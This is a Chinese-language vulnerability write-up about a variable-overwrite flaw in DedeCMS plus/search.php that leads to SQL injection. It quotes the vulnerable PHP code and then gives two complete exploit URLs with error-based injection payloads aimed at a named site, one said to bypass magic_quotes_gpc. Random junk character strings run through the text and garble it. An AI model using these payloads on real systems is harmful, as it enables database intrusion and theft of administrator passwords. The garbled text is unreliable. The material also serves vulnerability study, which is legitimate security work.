微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋., A1 x- L. q) `! v5 M
作者: c4rp3nt3r@0x50sec.org
( T }" ?0 K% H2 l. iDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码. M7 \& N5 [: J2 C( t. z
/ G0 @" G2 ]( ~. Z$ u( E黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.) l5 y' c) S1 U- C1 a9 D1 W8 d
, t- v) T5 A# b! h============6 `. w* Q& I+ [# u
3 E2 y4 T2 Z/ m5 T" P! t
9 h8 d- K) o" ~
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.# f. W# P6 t4 B x
" u- w& z! F6 G3 e" K. d3 \
require_once(dirname(__FILE__).”/../include/common.inc.php”);
2 G) X A! _, i: `require_once(DEDEINC.”/arc.searchview.class.php”);! F1 j5 f. [) K) \! A' @6 Y
z# F% M. s% x g$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;. N4 B7 ~. U: Z' b/ {
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
3 O( o* u* O* g$ N7 i2 ?% b( r3 B n$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;- s$ X4 `7 e* J `- c- C+ g
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
" f D8 X/ S) ^# a) P3 E$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;' Y' d6 o: m: ~+ j6 [* H3 I3 j4 r$ ~
5 E. t6 | Z1 h+ ^
if(!isset($orderby)) $orderby=”;
5 b# d9 ?0 B* ?% ~! }else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
" [0 \7 y1 C0 e7 j4 x ) k5 E( k+ m. z1 ?! v! a0 W
# S! [2 l0 T0 I y
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;4 Z( r. o& |% }0 f
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);5 ?) ^% G& ]8 v* U% S- e; b
! @. D+ t* N' ]4 B/ Z4 c
if(!isset($keyword)){
& t: } c2 o1 I) b; z. W9 z, n if(!isset($q)) $q = ”;2 x! `/ L j+ s4 ~7 {. D& l
$keyword=$q;
+ `0 E/ w& T6 ~% M- Z+ ]}; X9 z! b' s1 |8 s! s7 R1 ]
1 s: M# N! h8 r7 f6 f/ P% `
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));6 \% {, T6 \' p# y
3 R* z7 F# e; A& p, S2 U4 S+ ]7 f
//查找栏目信息" Q( g6 u6 S, F7 C6 C. a. g
if(empty($typeid))
9 h) V1 @4 w G9 M3 l{
) L1 r5 q# ? e/ h8 k7 H $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;( w' ]8 y$ t" O, |- k$ b# n, p, c
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )) a+ a, Q5 f- i4 G4 w
{; T& c- |7 _8 J8 B
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
L% Z6 c: W$ `1 I; o fwrite($fp, “<”.”?php\r\n”);8 K9 r9 E1 L- M8 C; D4 p
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);8 X; ?6 e* q' j1 `% c1 N7 R& s
$dsql->Execute();
$ @# t- | R! a( n while($row = $dsql->GetArray())& h) x3 U/ v) U) T3 T5 L: t
{( m& {! I. s; o* s/ _' q
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
, P1 h4 ~0 G. u! D) c5 ? }: w/ r; e$ ]3 m
fwrite($fp, ‘?’.'>’);
. D# T c& @5 Q R7 b k) J fclose($fp);
2 R6 B9 ` b8 R$ }6 T }
: ?9 z6 k+ j* f2 w3 }1 a' u0 I //引入栏目缓存并看关键字是否有相关栏目内容0 n" W& }9 C8 l& n1 \) ^! c# p
require_once($typenameCacheFile);
1 ]8 L! f3 U6 Z3 W f! d//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个7 q0 A* m7 I, L
//
- Y, O7 V2 x; l6 L if(isset($typeArr) && is_array($typeArr))9 z3 d& H, S' A {" F% u1 }) g
{% I Q0 B6 Q* S. F. b4 |, h
foreach($typeArr as $id=>$typename)
: V x) n; C/ D+ p. y0 J$ v) I, y { h/ z% U' \0 H7 G
; x G {* \( z% o# s! t/ f <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过' D) Y) ?) q* e) f# w) q8 l; c% R
if($keyword != $keywordn)
' i! E6 D, F8 a. \3 h0 s {( m( f; B4 _. d- E# l$ [: s
$keyword = $keywordn;9 q, G' F! Q7 C: g* U' h; P
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设0 F2 [# ?# O( [5 H+ b$ N! ^9 f, l
break;
- E& x9 p* B' g+ d }
9 L- |8 L! F1 v4 | }
6 v! b$ {4 S! p7 O! q8 Q }+ w+ x; d% H8 C1 c6 T/ t; c$ _5 p
}& q) q/ k1 S4 G& G5 M7 J( |
然后plus/search.php文件下面定义了一个 Search类的对象 .
c% n; q) b& |9 H在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
9 ]( y4 Z3 X- Q$this->TypeLink = new TypeLink($typeid);
5 F1 Y e4 m5 m s' x. b
; G4 f. [+ t" ]& STypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
) \7 V8 B, W Y1 o
# v5 {% ]: K" [) k: B* q/ f2 }class TypeLink y9 {6 V# Z+ Z1 ~9 b
{. w$ i' ]+ g2 h8 k" l( @* d5 J
var $typeDir;
" {. o: b) n! { z& v var $dsql;
" ~4 [& d8 e6 F1 ^1 D. f var $TypeID;
2 `& }4 }: [, A' Y- ]+ |, J var $baseDir;( r4 G1 Z) [0 M, g" F1 I1 u
var $modDir;8 E% o: Z( R) L U+ x" H# Q0 C
var $indexUrl;5 ]' B5 Q: N; o
var $indexName;
, S9 K( W) |& `9 x* A' T( v var $TypeInfos;
/ G8 ]- B& ?* I8 a var $SplitSymbol;
- N. ]8 X4 x* [+ H, G0 F var $valuePosition;# l+ @6 U5 i. X- i
var $valuePositionName;% H9 p" o$ o; H
var $OptionArrayList;//构造函数///////
9 \( M" j# i% i9 r //php5构造函数
. a% F& B2 i4 O function __construct($typeid)( n( l, t& g M" r: J% Z9 w
{$ ]) d5 U# N0 v! d% ?: e6 o
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl']; `* m: j' l3 _: ?' B8 @
$this->indexName = $GLOBALS['cfg_indexname'];
* }1 U4 q! P& S8 M9 S6 J# f $this->baseDir = $GLOBALS['cfg_basedir'];
' }* u) R9 T! l: \* ` $this->modDir = $GLOBALS['cfg_templets_dir']; [, O6 ?$ M& [1 v: }( k x
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];/ }+ Y3 _( w( q. H' O
$this->dsql = $GLOBALS['dsql'];/ l# `7 ?6 A- \; t4 n- x
$this->TypeID = $typeid;+ J7 Z- b2 G1 p5 p4 F
$this->valuePosition = ”;. c! W [ A2 E7 P2 q
$this->valuePositionName = ”;
1 E: B# P* b3 [5 S# }& @1 ? $this->typeDir = ”;/ Q$ G7 G$ R. R, J8 W2 {
$this->OptionArrayList = ”;
3 l& r+ c0 K5 g7 a ) r" e' n( Q8 t* ]
//载入类目信息
# j+ d4 W' q: [8 o( ?6 N 6 h0 q `" Q& f: n& r$ _, m! P
<font color=”Red”>$query = “SELECT tp.*,ch.typename as2 M1 v5 P5 ^2 n8 ^
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
9 B+ }6 `# U2 [9 A4 K0 M`#@__channeltype` ch
# U' O J) E+ O# }& x on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿0 L L- R% r* |. [
% Q" `( l7 I% h4 Y
if($typeid > 0)
9 b: O7 I9 |9 C6 v {
+ J0 G# N1 a v: h/ ] $this->TypeInfos = $this->dsql->GetOne($query);
0 r. T; c1 m* n- |利用代码一 需要 即使magic_quotes_gpc = Off
( G6 z% ^; E, F
# x3 M6 ~8 D1 d& `; i5 Owww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
9 S7 } b) L( W0 z1 Z' d
4 E- U3 m0 |# e7 i9 E2 t这只是其中一个利用代码… Search 类的构造函数再往下
- Z; g1 A% K( K; q5 X# v
' ^( J% c A1 e……省略
; v/ D, Y) p$ [6 }7 Y$this->TypeID = $typeid;: f- i! w. Q I. G' G! j
……省略2 m0 h8 v: |3 m, y, _9 \! [
if($this->TypeID==”0″){
3 l# x& M7 a) J $this->ChannelTypeid=1;! x! [- {; N- l5 K( q+ z+ n$ D5 b
}else{
0 F8 t: L: M* u5 e' G $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲7 V+ B! _3 q! f: E# ~
//现在不鸡肋了吧亲…3 m7 H& Y# r1 n
$this->ChannelTypeid=$row['channeltype'];
0 N2 ^! R% Y+ {1 n! `) c& W ' w' ]0 h* y/ y" P
}
; w. t/ a% [% [利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
& y) K) e7 Z$ O7 \( ] ~9 f0 R
5 A. @ ` x5 [5 _( h% s# A+ ^www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title9 K4 @" o0 @) c: I
+ q1 L& k D9 m
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
/ b5 l( @4 ~: v' A |